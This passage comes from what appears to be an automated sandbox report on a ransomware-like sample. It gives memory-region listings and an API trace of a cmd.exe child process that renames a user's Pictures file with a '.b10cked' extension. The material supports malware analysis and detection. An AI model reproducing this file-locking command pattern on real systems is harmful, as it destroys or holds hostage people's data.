Authentication" [0x7] Region: id = 16579 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16580 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16581 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16582 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 16583 start_va = 0x750000 end_va = 0x756fff entry_point = 0x750000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16584 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16585 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16586 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16587 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 16588 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16589 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16590 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16591 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 16592 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16593 start_va = 0x1e0000 end_va = 0x246fff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16594 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16595 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16596 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16597 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16598 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16599 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16600 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16601 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16602 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16603 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16604 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16605 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16606 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 16607 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16608 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 241 os_tid = 0x7b8 Process: id = "185" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ec0" os_pid = "0x934" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16621 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16622 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16623 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16624 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 16625 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16626 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16627 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16628 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16629 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 16630 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16811 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16812 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16813 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16814 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 16815 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16816 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16817 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16818 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16819 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16820 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16821 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16822 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16823 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16824 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16825 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16826 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16827 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16828 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16829 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16830 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16831 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16832 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 16833 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 16834 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 242 os_tid = 0x8cc [0143.781] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cff6c | out: lpSystemTimeAsFileTime=0x2cff6c*(dwLowDateTime=0x8fa317a0, dwHighDateTime=0x1d440a9)) [0143.782] GetCurrentProcessId () returned 0x934 [0143.782] GetCurrentThreadId () returned 0x8cc [0143.782] GetTickCount () returned 0x2ce94 [0143.782] QueryPerformanceCounter (in: lpPerformanceCount=0x2cff64 | out: lpPerformanceCount=0x2cff64*=20057081466) returned 1 [0143.782] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.782] __set_app_type (_Type=0x1) [0143.782] __p__fmode () returned 0x76b331f4 [0143.782] __p__commode () returned 0x76b331fc [0143.782] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.782] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.783] GetCurrentThreadId () returned 0x8cc [0143.783] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8cc) returned 0x38 [0143.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.783] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.783] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.783] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.783] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfefc | out: phkResult=0x2cfefc*=0x0) returned 0x2 [0143.783] VirtualQuery (in: lpAddress=0x2cff33, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.783] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.783] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.783] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.783] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfecc, dwLength=0x1c | out: lpBuffer=0x2cfecc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.783] GetConsoleOutputCP () returned 0x1b5 [0143.783] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.783] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.783] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.784] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.784] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.784] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.784] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.784] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.784] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.784] GetEnvironmentStringsW () returned 0x400150* [0143.784] FreeEnvironmentStringsW (penv=0x400150) returned 1 [0143.785] GetEnvironmentStringsW () returned 0x400150* [0143.785] FreeEnvironmentStringsW (penv=0x400150) returned 1 [0143.785] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cee6c | out: phkResult=0x2cee6c*=0x40) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x78, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x1, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x1, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x0, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x40, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x40, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x40, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegCloseKey (hKey=0x40) returned 0x0 [0143.785] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cee6c | out: phkResult=0x2cee6c*=0x40) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x40, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x1, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x1, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x0, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.785] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x9, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.786] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x4, lpData=0x2cee78*=0x9, lpcbData=0x2cee70*=0x4) returned 0x0 [0143.786] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cee74, lpData=0x2cee78, lpcbData=0x2cee70*=0x1000 | out: lpType=0x2cee74*=0x0, lpData=0x2cee78*=0x9, lpcbData=0x2cee70*=0x1000) returned 0x2 [0143.786] RegCloseKey (hKey=0x40) returned 0x0 [0143.786] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.786] srand (_Seed=0x5b886372) [0143.786] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"" [0143.786] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"" [0143.786] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.786] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.787] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.787] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.787] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.787] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.787] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.787] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.787] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.787] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.787] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.787] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.787] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.787] GetEnvironmentStringsW () returned 0x4022a0* [0143.787] FreeEnvironmentStringsW (penv=0x4022a0) returned 1 [0143.787] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.787] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.787] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.787] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.787] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.787] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.787] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.788] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.788] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.788] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.788] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfc38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfc38, lpFilePart=0x2cfc34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfc34*="Desktop") returned 0x18 [0143.788] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.788] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf9b4 | out: lpFindFileData=0x2cf9b4) returned 0x3fffe0 [0143.788] FindClose (in: hFindFile=0x3fffe0 | out: hFindFile=0x3fffe0) returned 1 [0143.788] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf9b4 | out: lpFindFileData=0x2cf9b4) returned 0x3fffe0 [0143.788] FindClose (in: hFindFile=0x3fffe0 | out: hFindFile=0x3fffe0) returned 1 [0143.789] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf9b4 | out: lpFindFileData=0x2cf9b4) returned 0x3fffe0 [0143.789] FindClose (in: hFindFile=0x3fffe0 | out: hFindFile=0x3fffe0) returned 1 [0143.789] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.789] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.789] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.789] GetEnvironmentStringsW () returned 0x402ac0* [0143.789] FreeEnvironmentStringsW (penv=0x402ac0) returned 1 [0143.789] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.790] GetConsoleOutputCP () returned 0x1b5 [0143.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.790] GetUserDefaultLCID () returned 0x409 [0143.790] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfd78, cchData=128 | out: lpLCData="0") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfd78, cchData=128 | out: lpLCData="0") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfd78, cchData=128 | out: lpLCData="1") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, 